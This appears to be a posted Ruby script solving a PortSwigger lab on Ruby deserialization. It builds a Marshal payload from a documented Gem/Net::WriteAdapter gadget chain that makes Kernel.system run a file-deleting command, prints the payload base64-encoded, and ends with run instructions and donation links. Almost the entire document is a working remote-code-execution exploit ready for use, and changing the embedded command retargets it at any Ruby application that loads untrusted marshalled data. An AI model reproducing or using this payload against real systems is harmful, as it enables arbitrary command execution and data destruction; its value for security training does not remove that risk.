Burp Suite Community - Exploiting Ruby deserialization using a documented gadget chain

#! /usr/bin/ruby require 'base64' # Autoload the required classes Gem::SpecFetcher Gem::Installer # prevent the payload from running when we Marshal.dump it module Gem class Requirement def marshal_dump [@requirements] end end end wa1 = Net::WriteAdapter.new(Kernel, :system) rs = Gem::RequestSet.allocate rs.instance_variable_set('@sets', wa1) rs.instance_variable_set('@git_set', "rm -r /home/carlos/morale.txt") wa2 = Net::WriteAdapter.new(rs, :resolve) i = Gem::Package::TarReader::Entry.allocate i.instance_variable_set('@read', 0) i.instance_variable_set('@header', "aaa") n = Net::BufferedIO.allocate n.instance_variable_set('@io', i) n.instance_variable_set('@debug_output', wa2) t = Gem::Package::TarReader.allocate t.instance_variable_set('@io', n) r = Gem::Requirement.allocate r.instance_variable_set('@requirements', t) payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r]) #puts payload.inspect #puts Marshal.load(payload) puts Base64.encode64(payload) ON_LINUX: ------------------ $ sudo ruby {FILE.rb} DONATE: --------------- PAT: https://www.patreon.com/rezatahirkheli PP: https://www.paypal.com/paypalme/rezatahirkheli1 BTC: 3EUQBWZKX9Vcwdffd3cUGATQopxrAQQxJ9 LTC: MBXE6hJgxxFYSD8SjmR7sHCHGTqFXmNGoU GFM: https://gofund.me/7d6500bd